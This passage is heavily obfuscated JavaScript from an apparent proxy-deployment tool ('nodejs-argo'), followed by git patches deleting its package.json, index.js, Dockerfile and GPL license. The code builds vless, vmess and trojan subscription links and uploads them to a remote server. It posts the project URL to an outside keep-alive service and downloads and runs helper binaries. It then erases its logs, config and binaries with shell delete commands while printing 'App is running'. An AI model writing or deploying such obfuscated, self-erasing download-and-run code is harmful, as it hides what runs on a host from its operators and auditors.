_0x59f992={};_0x59f992['v']='2',_0x59f992['ps']=''+_0x1fed17,_0x59f992[_0x2d4c1b(0x30,-0x10e,0x70,-0x10)]=CFIP,_0x59f992['port']=CFPORT,_0x59f992['id']=UUID,_0x59f992['aid']='0',_0x59f992[_0x2d4c1b(-0x8b,0x79,-0x199,0x23)]=_0x59e0c0[_0x25f992(-0x23,0x22,0x126,0xce)],_0x59f992['net']='ws',_0x59f992[_0x2d4c1b(-0x239,-0x307,-0x2e1,-0x1f8)]=_0x59e0c0[_0x25f992(0x155,0x22,0x26,0x158)],_0x59f992[_0x2d4c1b(-0x73,-0x19,-0x27,-0x4d)]=_0x5a2178,_0x59f992[_0x25f992(0x1d2,0x105,0x186,0xdb)]=_0x25f992(0xc1,0x48,0x128,-0xaf)+_0x25f992(0x170,0x1a8,0x1dc,0x2f6),_0x59f992[_0x25f992(0x200,0x18c,0x80,0x10c)]='tls',_0x59f992[_0x25f992(0x2f4,0x197,0x14f,0x29)]=_0x5a2178,_0x59f992['alpn']='',_0x59f992['fp']=_0x59e0c0['HjKwF'];const _0x152cda=_0x59f992,_0x4c6801=_0x2d4c1b(-0xa,0x32,-0xe2,-0x159)+UUID+'@'+CFIP+':'+CFPORT+(_0x25f992(-0x11,0x15a,0x1ef,0x299)+'n=none&sec'+_0x2d4c1b(-0xfd,0x39,-0x166,-0x1ee)+_0x2d4c1b(-0x17e,-0x200,-0x1b,-0x56))+_0x5a2178+('&fp=firefo'+_0x25f992(0x2e0,0x21c,0x161,0x21b)+'host=')+_0x5a2178+(_0x25f992(0x19c,0xc3,0xd9,0xfc)+_0x25f992(0x2a8,0x248,0x11f,0x241)+_0x2d4c1b(-0x1c2,-0x2d4,-0x16e,-0x245)+'0#')+_0x1fed17+(_0x2d4c1b(-0x48,0x9a,0x53,-0xb3)+'//')+Buffer[_0x2d4c1b(-0x264,-0x255,-0x206,-0x10e)](JSON[_0x25f992(0x371,0x258,0x29e,0x161)](_0x152cda))[_0x25f992(-0x90,0x6f,0x7e,0x1cd)](_0x2d4c1b(0x6e,-0xd,0xc8,0x1c2))+('\x0a\x20\x20\x0atrojan'+_0x25f992(0xd6,0x227,0x17a,0x1d9))+UUID+'@'+CFIP+':'+CFPORT+(_0x2d4c1b(-0x13e,0xe,-0x227,-0x4d)+_0x2d4c1b(-0xd2,-0x11d,-0x11f,-0xa9))+_0x5a2178+('&fp=firefo'+'x&type=ws&'+'host=')+_0x5a2178+(_0x2d4c1b(0x40,0x10c,-0x36,-0xdd)+_0x2d4c1b(-0x216,-0x30f,-0x319,-0x1c2)+'%3Fed%3D25'+_0x2d4c1b(-0x50,0xc3,0x87,0xf9))+_0x1fed17+_0x25f992(-0xd1,0x7,0x4c,-0x3d);console[_0x25f992(0x113,0xe,-0x37,-0xfc)](Buffer[_0x2d4c1b(-0x264,-0x11d,-0x324,-0x2e7)](_0x4c6801)[_0x2d4c1b(-0x180,-0x28,-0x1c,-0x284)]('base64')),fs[_0x25f992(0x21a,0xe7,0x1f2,0x20b)+_0x2d4c1b(-0x1d6,-0x1ca,-0xc4,-0x24d)](subPath,Buffer[_0x2d4c1b(-0x264,-0x254,-0x2fa,-0x1a6)](_0x4c6801)[_0x2d4c1b(-0x180,-0x12e,-0x29d,-0x1f3)](_0x25f992(0x277,0x25d,0x2d4,0x359))),console['log'](FILE_PATH+(_0x25f992(-0x10c,0x14,0x15d,0x14e)+_0x2d4c1b(-0x194,-0x252,-0x16a,-0x2f0)+_0x25f992(0xe5,0x212,0x13e,0x2b6))),_0x59e0c0['OMHZG'](uploadNodes),app[_0x25f992(-0x60,-0x50,0x72,0x35)]('/'+SUB_PATH,(_0x467dba,_0x5420bb)=>{function _0x53c7f2(_0x118706,_0xd76d,_0x7f0045,_0x55ed5a){return _0x25f992(_0x118706-0x1e2,_0x7f0045-0x237,_0x7f0045-0xaa,_0x55ed5a);}function _0x3dd983(_0x47969e,_0xc33e23,_0x3468fa,_0x4fe543){return _0x2d4c1b(_0xc33e23-0x4be,_0x47969e,_0x3468fa-0x1f,_0x4fe543-0x136);}if(_0x35dc12[_0x3dd983(0xef,0x25e,0x2c6,0x205)](_0x35dc12[_0x53c7f2(0x2a3,0x295,0x371,0x455)],_0x53c7f2(0x4af,0x329,0x498,0x4ac)))return null;else{const _0x1af210=Buffer[_0x3dd983(0x3b5,0x25a,0x227,0x283)](_0x4c6801)[_0x3dd983(0x313,0x33e,0x1da,0x406)](_0x35dc12[_0x53c7f2(0x3c7,0x1e3,0x2b0,0x258)]);_0x5420bb[_0x53c7f2(0x3f3,0x541,0x482,0x3f5)](_0x35dc12['fqjvW'],_0x35dc12[_0x3dd983(0x5b2,0x525,0x552,0x66f)]),_0x5420bb['send'](_0x1af210);}}),_0x176535(_0x4c6801);}else _0x441e4f['error'](_0x25f992(-0xf9,0x31,-0x6c,-0x128)+'g\x20error:\x20'+_0x157d0b);},0x37*-0xa6+0x148b+0x16ef);});}}}async function uploadNodes(){function _0x33eb5(_0x1237c6,_0x22d7e5,_0x357801,_0x5b01ac){return _0x388b12(_0x22d7e5,_0x22d7e5-0x19c,_0x357801-0x4e,_0x5b01ac-0x20c);}function _0x401441(_0x33a012,_0x2df26f,_0xba465f,_0x56868b){return _0x388b12(_0x2df26f,_0x2df26f-0x128,_0xba465f-0x1b1,_0xba465f- -0x1ad);}const _0x4688c7={};_0x4688c7['bUWVf']=_0x33eb5(0x250,0x3c3,0x3d3,0x308),_0x4688c7[_0x33eb5(0x1e8,0x2b2,0x2b6,0x31c)]=function(_0x2c33e6,_0x34ae5e){return _0x2c33e6&&_0x34ae5e;},_0x4688c7[_0x401441(-0xc4,0x72,0x55,0x3c)]=function(_0x5a26f6,_0x452908){return _0x5a26f6===_0x452908;},_0x4688c7[_0x401441(0x2df,0x2ca,0x18d,0x20b)]=_0x401441(-0xdd,-0x66,-0xa5,-0x1f6),_0x4688c7[_0x33eb5(0x26e,0x4c1,0x412,0x3b3)]=_0x401441(0x2d9,0x2a9,0x20e,0x274),_0x4688c7[_0x33eb5(0x4b8,0x29b,0x413,0x3d0)]=_0x401441(0xc8,0x63,-0x8d,-0x3b),_0x4688c7[_0x401441(0x38,-0x129,-0xb8,-0x122)]=_0x33eb5(0x4c7,0x494,0x54b,0x3f8)+'n/json',_0x4688c7[_0x401441(0x83,0x1a3,0xbd,-0x9f)]=_0x401441(-0xe9,-0x95,0x7,-0x13e)+_0x401441(0xcb,-0xbe,0xaa,0x131)+'d\x20successf'+'ully',_0x4688c7[_0x401441(-0x90,-0x1d9,-0x6a,-0x101)]=_0x33eb5(0x58f,0x612,0x461,0x576),_0x4688c7[_0x401441(0x8e,-0xd,0xf,-0xd5)]=_0x401441(-0x92,0x93,0x58,-0x91),_0x4688c7['YKaCk']=_0x401441(0x265,0x22a,0x187,0x111),_0x4688c7[_0x401441(0xc3,0x149,-0x5,0x64)]=function(_0x22b1fe,_0x3a62ca){return _0x22b1fe===_0x3a62ca;},_0x4688c7['eAOwY']=_0x33eb5(0x569,0x460,0x4ad,0x59c)+_0x401441(0x12a,-0x70,0xdd,-0x39)+_0x401441(0x1fb,0x105,0x1cd,0xc0);const _0xcae4fc=_0x4688c7;if(_0xcae4fc[_0x33eb5(0x1bc,0x265,0x1ec,0x31c)](UPLOAD_URL,PROJECT_URL)){if(_0xcae4fc['zVIVL'](_0x401441(-0x1d6,-0x181,-0xa5,-0x34),_0xcae4fc[_0x401441(0x2ea,0x19c,0x18d,0x287)])){const _0xe0ff84=PROJECT_URL+'/'+SUB_PATH,_0x53c3d2={};_0x53c3d2[_0x401441(-0x142,-0xd8,-0x1b,-0x89)+'on']=[_0xe0ff84];const _0x392e98=_0x53c3d2;try{if(_0xcae4fc[_0x33eb5(0x363,0x3f9,0x481,0x40e)](_0xcae4fc[_0x33eb5(0x51b,0x2c5,0x287,0x3b3)],_0xcae4fc[_0x401441(0x8f,0xf9,0x17,-0x145)]))_0x351f1d[_0x33eb5(0x233,0x3a6,0x43d,0x348)](),_0x3aa170[_0x401441(-0xcf,-0x54,-0x37,-0xe5)](_0x401441(0xed,0x2,0x44,0xd1)+_0x33eb5(0x4e4,0x5ae,0x653,0x54d)),_0x3ddeb9[_0x401441(0x35,-0x96,-0x37,0x8d)](_0x401441(0xe8,0x1b4,0x1cc,0x174)+_0x33eb5(0x6f3,0x65a,0x6e8,0x5a6)+'this\x20scrip'+_0x33eb5(0x40a,0x3d6,0x581,0x431));else{const _0x456ee8={};_0x456ee8[_0x401441(0xac,0x183,0x195,0x46)+'pe']=_0xcae4fc[_0x401441(0x9c,0x2b,-0xb8,-0x1ff)];const _0x226a47={};_0x226a47[_0x401441(0x185,0xc5,0x210,0x146)]=_0x456ee8;const _0x4e7185=await axios[_0x33eb5(0x5bb,0x468,0x4f0,0x521)](UPLOAD_URL+('/api/add-s'+_0x401441(0x10f,-0xd8,-0x2a,0x12f)+'ns'),_0x392e98,_0x226a47);if(_0x4e7185&&_0xcae4fc[_0x401441(0xb9,-0xa9,0x55,0x2)](_0x4e7185[_0x401441(0x2d,-0x88,0xbc,-0x41)],0x1*-0x2423+-0x2*-0x912+0x12c7))return console[_0x33eb5(0x2b3,0x335,0x3e0,0x382)](_0xcae4fc[_0x401441(-0x1e,-0xb0,0xbd,0x1e9)]),_0x4e7185;else{if(_0xcae4fc[_0x33eb5(0x3e4,0x2d3,0x346,0x34f)]!=='OEWzc')_0x1e1cbb(_0x3e0036);else return null;}}}catch(_0x4ec16e){if(_0x4ec16e[_0x33eb5(0x50f,0x488,0x392,0x3ee)]){if(_0xcae4fc[_0x33eb5(0x536,0x359,0x55e,0x40e)](_0x4ec16e['response'][_0x33eb5(0x39c,0x46a,0x50e,0x475)],-0x242a*0x1+0x1224+-0x6d*-0x2e)){}}}}else return _0xcae4fc[_0x33eb5(0x68b,0x6e2,0x51b,0x5ae)];}else{if(UPLOAD_URL){if(!fs[_0x33eb5(0x3bc,0x540,0x5de,0x528)](listPath))return;const _0xc41096=fs[_0x33eb5(0x54c,0x414,0x3e5,0x48a)+'nc'](listPath,_0xcae4fc[_0x33eb5(0x3d2,0x3ae,0x48b,0x3c8)]),_0x43af2c=_0xc41096[_0x401441(0x125,0x1de,0xb4,0x20d)]('\x0a')[_0x33eb5(0x4d8,0x62a,0x56a,0x4c7)](_0x17c87d=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x33eb5(0x1e9,0x3c2,0x3e1,0x357)](_0x17c87d));if(_0x43af2c[_0x33eb5(0x49a,0x649,0x65a,0x56c)]===-0x2353+0x1e1c+0x537)return;const _0x3ce47a={};_0x3ce47a[_0x33eb5(0x399,0x535,0x4e0,0x4f5)]=_0x43af2c;const _0x5aa9b5=JSON[_0x33eb5(0x543,0x627,0x71a,0x5cc)](_0x3ce47a);try{if(_0xcae4fc[_0x401441(0xe7,0x6f,0x55,0xed)](_0xcae4fc[_0x33eb5(0x44d,0x624,0x516,0x534)],_0xcae4fc[_0x33eb5(0x4c3,0x646,0x431,0x534)])){const _0x47aaa3={};_0x47aaa3[_0x401441(0x2ce,0x29a,0x195,0x281)+'pe']=_0xcae4fc[_0x33eb5(0x1f4,0x357,0x203,0x301)];const _0xb45487={};_0xb45487[_0x401441(0x269,0x307,0x210,0x1f3)]=_0x47aaa3;const _0x4dc068=await axios[_0x401441(0x25d,0x290,0x168,0x2ca)](UPLOAD_URL+(_0x401441(0x1ec,0x105,0x186,0x4b)+_0x33eb5(0x3d3,0x446,0x34a,0x313)),_0x5aa9b5,_0xb45487);return _0x4dc068&&_0xcae4fc[_0x33eb5(0x505,0x29c,0x4e6,0x3b4)](_0x4dc068['status'],-0x25db+-0x723+-0x9*-0x516)?(console[_0x33eb5(0x2a5,0x243,0x2d3,0x382)](_0xcae4fc['eAOwY']),_0x4dc068):null;}else _0x380f71[_0x33eb5(0x5e6,0x463,0x5b9,0x588)](_0x37ff71);}catch(_0x4fa4f4){return null;}}else return;}}function cleanFiles(){const _0xc2a350={'yuTyX':'App\x20is\x20run'+_0x16afa8(0x658,0x5d1,0x65c,0x5c4),'BdQcG':'Thank\x20you\x20'+_0x16afa8(0x6d3,0x6c1,0x6b5,0x670)+_0x2dbb7e(0x835,0x750,0x7c6,0x73f)+_0x16afa8(0x5d5,0x4fc,0x540,0x55b),'tmMOh':_0x2dbb7e(0x56d,0x724,0x50a,0x5ed),'nUoBZ':function(_0x122975,_0xf4c1e2){return _0x122975(_0xf4c1e2);},'PxFGX':function(_0x220262,_0x12b559){return _0x220262+_0x12b559;},'gxaBC':_0x2dbb7e(0x62c,0x6a4,0x79b,0x731)+_0x2dbb7e(0x54b,0x5f8,0x5b6,0x5b6),'yQhWL':'{}.constru'+_0x2dbb7e(0x8cb,0x75d,0x890,0x7ae)+'rn\x20this\x22)('+'\x20)','oXyEi':function(_0x5646a7,_0x5742ef){return _0x5646a7!==_0x5742ef;},'WNxGH':_0x2dbb7e(0x66f,0x509,0x723,0x5eb),'bLZcN':_0x16afa8(0x6b8,0x617,0x61d,0x50d),'hrZNp':function(_0x4f1990,_0x33ca2c){return _0x4f1990===_0x33ca2c;},'hVwMW':function(_0x1f4a42,_0x4d949e){return _0x1f4a42&&_0x4d949e;},'ZVLNE':_0x16afa8(0x586,0x556,0x43d,0x486),'dMGdO':function(_0x43965a,_0x57dfb1,_0x185288){return _0x43965a(_0x57dfb1,_0x185288);}};function _0x16afa8(_0x2d91ba,_0x691ce2,_0x1117aa,_0x3ed3d8){return _0x388b12(_0x691ce2,_0x691ce2-0x8b,_0x1117aa-0xcf,_0x1117aa-0x31b);}function _0x2dbb7e(_0x57ea4a,_0x57304c,_0x42f45e,_0x2419e0){return _0x388b12(_0x42f45e,_0x57304c-0x78,_0x42f45e-0x113,_0x2419e0-0x411);}setTimeout(()=>{const _0x11cfa1={'qrECF':function(_0x526fe3,_0x18f9ea){function _0x4fa610(_0x58df0c,_0x5e3876,_0x32c232,_0x178135){return _0x4971(_0x5e3876- -0x154,_0x178135);}return _0xc2a350[_0x4fa610(0x240,0x247,0x38d,0x121)](_0x526fe3,_0x18f9ea);},'JUCSN':function(_0x8a15e1,_0x2a9a8f){return _0xc2a350['PxFGX'](_0x8a15e1,_0x2a9a8f);},'HvKZD':_0xc2a350[_0x4fb80a(0x53e,0x662,0x6c9,0x6e0)],'SKcaB':_0xc2a350['yQhWL'],'MkvcF':function(_0x4c0388,_0x3cd3d6){function _0x3f1376(_0x26423a,_0xd2c353,_0x451b55,_0x335910){return _0x4fb80a(_0x26423a-0x6f,_0x335910- -0x4f2,_0x451b55-0x1b6,_0x451b55);}return _0xc2a350[_0x3f1376(0x187,0x27e,0xac,0x1da)](_0x4c0388,_0x3cd3d6);},'grBNg':_0xc2a350['WNxGH'],'AmvJA':_0xc2a350[_0x83e643(0xa8,-0xa2,-0xc5,0x69)],'MjxYv':_0xc2a350[_0x4fb80a(0x697,0x5d3,0x51e,0x73b)]};function _0x4fb80a(_0x503716,_0x126745,_0xa5f007,_0x384ef3){return _0x2dbb7e(_0x503716-0x101,_0x126745-0xf7,_0x384ef3,_0x126745- -0x91);}function _0x83e643(_0x5b344c,_0x1539f4,_0x11a807,_0x58575b){return _0x2dbb7e(_0x5b344c-0x1,_0x1539f4-0x141,_0x11a807,_0x5b344c- -0x598);}if(_0xc2a350[_0x83e643(0x1c5,0x179,0x14f,0x116)](_0xc2a350['bLZcN'],_0xc2a350[_0x83e643(0x12e,0x25b,0x19c,0xe9)]))_0x5eadb9[_0x4fb80a(0x4c1,0x538,0x4d4,0x57d)](_0x23b57e,_0x3a806e,_0x8b3058=>{function _0x358403(_0x11ca7b,_0x55432c,_0x42fea3,_0x234bed){return _0x4fb80a(_0x11ca7b-0x4,_0x234bed- -0x6eb,_0x42fea3-0x3c,_0x11ca7b);}function _0x46fae4(_0x1112d7,_0x5d49dc,_0x516b23,_0x35ec32){return _0x83e643(_0x516b23-0x11,_0x5d49dc-0x19f,_0x1112d7,_0x35ec32-0x37);}_0x8b3058?_0x5c9ae1['error']('Empowermen'+_0x46fae4(0x173,-0x14,0x137,-0x17)+'or\x20'+_0x189760+':\x20'+_0x8b3058):_0x57aba7[_0x46fae4(0xf4,0x14b,0x0,-0x12c)](_0x46fae4(0xf,0x1f,-0x48,0xb4)+_0x46fae4(0x18c,0x282,0x243,0x113)+_0x46fae4(-0x45,0x147,0x11c,0x1c4)+_0x49bc23+':\x20'+_0x2233ab['toString'](-0x1295*0x2+-0x1218+-0x15*-0x2a2));});else{const _0xbeb184=[bootLogPath,configPath,webPath,botPath];if(NEZHA_PORT)_0xc2a350[_0x4fb80a(0x6fc,0x5ae,0x575,0x6d2)](_0x83e643(0x80,0x6e,-0xc8,0x62),_0x83e643(0x80,-0x84,0x37,0x1c0))?_0xbeb184['push'](npmPath):(_0x224ed6[_0x83e643(-0x4b,-0xb4,-0xa9,0x96)](),_0x512833[_0x4fb80a(0x58f,0x4f6,0x573,0x3cd)](_0xc2a350[_0x83e643(0xa8,-0xbd,-0x4f,0xfe)]),_0x4a973e[_0x83e643(-0x11,-0x80,-0x11a,0xf9)](_0xc2a350['BdQcG']));else _0xc2a350[_0x83e643(0xfa,0x1f7,0x188,0x159)](NEZHA_SERVER,NEZHA_KEY)&&_0xbeb184[_0x4fb80a(0x5f7,0x6fc,0x67a,0x816)](phpPath);_0xc2a350['hrZNp'](process[_0x4fb80a(0x5ae,0x4d5,0x5c6,0x4fe)],_0xc2a350[_0x83e643(0x56,0x6,0x61,0x5f)])?_0xc2a350[_0x83e643(-0x8a,-0x1ca,-0x183,-0x171)](exec,'del\x20/f\x20/q\x20'+_0xbeb184[_0x4fb80a(0x55b,0x6a3,0x548,0x801)]('\x20')+('\x20>\x20nul\x202>&'+'1'),_0x2f784f=>{function _0xeff02a(_0x5e7d30,_0x404b11,_0x4aaf22,_0x326c28){return _0x83e643(_0x5e7d30-0x1a2,_0x404b11-0x3e,_0x326c28,_0x326c28-0x1a6);}function _0x413a42(_0x271ace,_0x3d873e,_0x2ac448,_0x6e06d4){return _0x4fb80a(_0x271ace-0xe2,_0x6e06d4- -0x111,_0x2ac448-0x182,_0x271ace);}if(_0x11cfa1[_0xeff02a(0x2c5,0x308,0x262,0x161)](_0x11cfa1[_0xeff02a(0x1e0,0x1d3,0xd6,0x22c)],_0x11cfa1[_0xeff02a(0x1e0,0x2bb,0x2b1,0x2c5)])){const _0x27e20d=KvJjGZ[_0x413a42(0x47b,0x49e,0x478,0x581)](_0x4424a6,KvJjGZ[_0xeff02a(0x243,0x384,0x286,0x167)](KvJjGZ[_0x413a42(0x4a1,0x424,0x374,0x497)](KvJjGZ[_0xeff02a(0x2f1,0x345,0x31b,0x2be)],KvJjGZ[_0xeff02a(0x378,0x25d,0x378,0x2a3)]),');'));_0x224acf=_0x27e20d();}else console[_0x413a42(0x2dd,0x37d,0x484,0x3ab)](),console[_0x413a42(0x331,0x2f0,0x441,0x3e5)](_0x11cfa1[_0x413a42(0x40c,0x2ee,0x3be,0x3fd)]),console[_0xeff02a(0x191,0x2d3,0x52,0x12a)](_0x11cfa1['MjxYv']);}):_0xc2a350[_0x83e643(-0x8a,-0x13e,-0x1f0,-0x1c1)](exec,_0x83e643(0x15a,0x15b,0x57,0x29d)+_0xbeb184[_0x83e643(0x19c,0x2c6,0x15c,0x137)]('\x20')+(_0x4fb80a(0x46c,0x478,0x338,0x56f)+_0x4fb80a(0x737,0x743,0x85d,0x60f)),_0x33f154=>{function _0x47d6da(_0x4b6cf9,_0x572d02,_0x10b027,_0x4d870d){return _0x83e643(_0x4d870d- -0x204,_0x572d02-0xfe,_0x10b027,_0x4d870d-0x2f);}function _0x2f87af(_0x619935,_0x4dcb4e,_0x1d683b,_0x5328bc){return _0x4fb80a(_0x619935-0xc1,_0x4dcb4e- -0x1a,_0x1d683b-0x184,_0x5328bc);}if(_0xc2a350[_0x47d6da(-0x184,-0x21a,-0xda,-0x180)]!=='MmMrt')return;else console[_0x2f87af(0x3c9,0x4a2,0x4b6,0x4fd)](),console['log'](_0x2f87af(0x5a2,0x557,0x604,0x3f2)+'ning'),console[_0x2f87af(0x4eb,0x4dc,0x612,0x52f)]('Thank\x20you\x20'+'for\x20using\x20'+_0x47d6da(-0x82,0x4c,-0x10a,-0x5d)+_0x2f87af(0x5f4,0x58b,0x48b,0x61c));});}},-0x1a723*0x1+0x7445+-0x32a6*-0xd);}cleanFiles();async function AddVisitTask(){const _0x41e009={};_0x41e009['yAWuu']=_0x541632(0x59b,0x487,0x4cf,0x443)+_0x541632(0x665,0x52a,0x47e,0x5a1)+_0x541632(0x6d4,0x654,0x5ee,0x50a)+'ully',_0x41e009[_0x541632(0x605,0x64e,0x611,0x7aa)]=function(_0x4c63fe,_0x5aefc1){return _0x4c63fe||_0x5aefc1;},_0x41e009['dxoIg']=_0x541632(0x614,0x5fa,0x766,0x678)+_0x541632(0x4b9,0x5b0,0x446,0x498)+_0x541632(0x36d,0x427,0x47d,0x2bd)+_0x55709e(0x284,0x3a0,0x437,0x33d),_0x41e009[_0x541632(0x54a,0x51d,0x411,0x46e)]=function(_0x5f4fd0,_0xceae7e){return _0x5f4fd0!==_0xceae7e;},_0x41e009['LPNfa']=_0x541632(0x520,0x5fd,0x558,0x72b);function _0x55709e(_0x2bef9f,_0x3c552f,_0x519668,_0x37585b){return _0x388b12(_0x2bef9f,_0x3c552f-0x40,_0x519668-0x186,_0x37585b-0x233);}_0x41e009[_0x541632(0x655,0x523,0x43f,0x55a)]='applicatio'+_0x541632(0x56e,0x459,0x410,0x399);const _0x2a418e=_0x41e009;function _0x541632(_0x5e58d4,_0x2592f0,_0x47a90c,_0x23beb9){return _0x4d5570(_0x5e58d4-0xc6,_0x2592f0-0x81,_0x47a90c-0x95,_0x5e58d4);}if(_0x2a418e[_0x55709e(0x59b,0x5f1,0x59d,0x5ae)](!AUTO_ACCESS,!PROJECT_URL)){console[_0x541632(0x535,0x449,0x549,0x5b2)](_0x2a418e[_0x541632(0x56b,0x577,0x624,0x4ff)]);return;}try{if(_0x2a418e['TZNSk'](_0x541632(0x6ab,0x5fd,0x67f,0x76d),_0x2a418e['LPNfa']))return _0x31a167['log'](_0x2a418e[_0x55709e(0x46b,0x34f,0x4ec,0x4aa)]),_0x1c5e3a;else{const _0x42fc0c={};_0x42fc0c[_0x541632(0x4ae,0x4d0,0x62d,0x4c2)]=PROJECT_URL;const _0x195d73={};_0x195d73[_0x541632(0x5ae,0x615,0x746,0x5ba)+'pe']=_0x2a418e[_0x541632(0x459,0x523,0x524,0x593)];const _0x3d0a29={};_0x3d0a29['headers']=_0x195d73;const _0xce006e=await axios['post']('https://oo'+_0x541632(0x40e,0x4e8,0x3cb,0x61a)+_0x541632(0x547,0x629,0x6a4,0x73e)+'l',_0x42fc0c,_0x3d0a29);return console[_0x55709e(0x4ba,0x44b,0x302,0x3a9)]('automatic\x20'+_0x55709e(0x419,0x4ee,0x5c0,0x45d)+'k\x20added\x20su'+_0x55709e(0x43b,0x3c8,0x45f,0x447)),_0xce006e;}}catch(_0x589302){return console[_0x55709e(0x354,0x391,0x58e,0x488)](_0x55709e(0x51b,0x6c3,0x675,0x5ed)+'tic\x20access'+_0x541632(0x4f1,0x422,0x4a7,0x50a)+'d:\x20'+_0x589302[_0x541632(0x4e9,0x64a,0x5f3,0x60f)]),null;}}async function startserver(){function _0x1774ab(_0x2e21f8,_0x535001,_0x32b80e,_0xa796fd){return _0x4d5570(_0x2e21f8-0x9d,_0x535001- -0x26c,_0x32b80e-0xbe,_0x32b80e);}const _0x57a557={'iFfpe':'0|5|3|2|1|'+'4','TeZvz':function(_0x2b38ae){return _0x2b38ae();},'hemou':function(_0x47ab9b){return _0x47ab9b();},'LPVUR':function(_0x33070e){return _0x33070e();},'Umkow':function(_0x26b8b5){return _0x26b8b5();},'tRXmF':'Error\x20in\x20s'+_0x1774ab(0x91,0xff,0x22c,-0xa)+':'};function _0x4733ab(_0x1cd4c5,_0xc42bee,_0x34eb9a,_0x1807c3){return _0x4d5570(_0x1cd4c5-0x1c0,_0x1807c3- -0xd6,_0x34eb9a-0x66,_0x1cd4c5);}try{const _0x58bc96=_0x57a557[_0x4733ab(0x4b6,0x331,0x598,0x43a)][_0x1774ab(0x1c4,0x247,0x19d,0x216)]('|');let _0x1a2bcd=-0xb20+0xcff+-0x1df*0x1;while(!![]){switch(_0x58bc96[_0x1a2bcd++]){case'0':_0x57a557[_0x4733ab(0x40a,0x449,0x524,0x4c3)](deleteNodes);continue;case'1':await extractDomains();continue;case'2':await _0x57a557['hemou'](downloadFilesAndRun);continue;case'3':await _0x57a557[_0x1774ab(0x335,0x3a5,0x483,0x316)](generateConfig);continue;case'4':await AddVisitTask();continue;case'5':_0x57a557['Umkow'](cleanupOldFiles);continue;}break;}}catch(_0x1ef978){console[_0x4733ab(0x3b5,0x314,0x2df,0x3d1)](_0x57a557[_0x1774ab(0x465,0x2fa,0x273,0x289)],_0x1ef978);}}startserver()['catch'](_0x40ac11=>{const _0x1560ce={};_0x1560ce[_0x545f8e(0x14,0xc8,-0xea,0x7a)]=_0x545f8e(0x1c7,0x257,0x295,0x1f4)+_0x545f8e(0x1a1,0x89,-0xe0,0x89)+'tartserver'+':';function _0x1bb263(_0x66b087,_0xb7ab8c,_0x1569ae,_0x577d61){return _0x388b12(_0x1569ae,_0xb7ab8c-0x90,_0x1569ae-0x16a,_0x577d61- -0x346);}function _0x545f8e(_0x18be80,_0x1f4100,_0x2e5282,_0x16133e){return _0x388b12(_0x2e5282,_0x1f4100-0x199,_0x2e5282-0x1c1,_0x16133e- -0x7c);}const _0x389079=_0x1560ce;console[_0x1bb263(-0xb6,-0xc0,-0x1a2,-0xf1)](_0x389079[_0x1bb263(-0x302,-0x245,-0x157,-0x250)],_0x40ac11);}),app[_0x4d5570(0x370,0x388,0x4b7,0x2da)](PORT,()=>console[_0x4d5570(0x2ad,0x3c8,0x46e,0x499)](_0x4d5570(0x46b,0x4e7,0x525,0x63b)+'r\x20is\x20runni'+_0x388b12(0x22f,0x275,0xff,0x163)+':'+PORT+'!')); +111111 From 6609ed237d596e8133242793259d014861993635 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:51:19 +0800 Subject: [PATCH 05/19] Delete package.json --- package.json | 21 --------------------- 1 file changed, 21 deletions(-) delete mode 100644 package.json diff --git a/package.json b/package.json deleted file mode 100644 index 345c61fd3e..0000000000 --- a/package.json +++ /dev/null @@ -1,21 +0,0 @@ -{ - "name": "nodejs-argo", - "version": "1,0,0", - "description": "Thsi is a node project", - "main": "index.js", - "author": "eooce", - "repository": "", - "license": "MIT", - "private": false, - "scripts": { - "dev": "node index.js", - "start": "node index.js" - }, - "dependencies": { - "axios": "latest", - "express": "^4.18.2" - }, - "engines": { - "node": ">=14" - } -} From 2be0144b204af6ba0e491ac0da354a17a0e00e53 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:51:29 +0800 Subject: [PATCH 06/19] Delete index.js --- index.js | 1 - 1 file changed, 1 deletion(-) delete mode 100644 index.js diff --git a/index.js b/index.js deleted file mode 100644 index 90d2950097..0000000000 --- a/index.js +++ /dev/null @@ -1 +0,0 @@ -111111 From 5f99d7b53a8a2a6c9ac3117d078b675d25576c41 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:51:38 +0800 Subject: [PATCH 07/19] Delete Dockerfile --- Dockerfile | 15 --------------- 1 file changed, 15 deletions(-) delete mode 100644 Dockerfile diff --git a/Dockerfile b/Dockerfile deleted file mode 100644 index c1a1a789cf..0000000000 --- a/Dockerfile +++ /dev/null @@ -1,15 +0,0 @@ -FROM node:alpine3.20 - -WORKDIR /tmp - -COPY . . - -EXPOSE 3000/tcp - -RUN apk update && apk upgrade &&\ - apk add --no-cache openssl curl gcompat iproute2 coreutils &&\ - apk add --no-cache bash &&\ - chmod +x index.js &&\ - npm install - -CMD ["node", "index.js"] From c27d96c0485693031107d54f54cc293b39ca1ce5 Mon Sep 17 00:00:00 2001 From: hansc86 <49715253+hansc86@users.noreply.github.com> Date: Fri, 24 Apr 2026 20:51:51 +0800 Subject: [PATCH 08/19] Delete LICENSE --- LICENSE | 674 -------------------------------------------------------- 1 file changed, 674 deletions(-) delete mode 100644 LICENSE diff --git a/LICENSE b/LICENSE deleted file mode 100644 index f288702d2f..0000000000 --- a/LICENSE +++ /dev/null @@ -1,674 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. - - Developers that use the GNU GPL protect your rights with two steps: 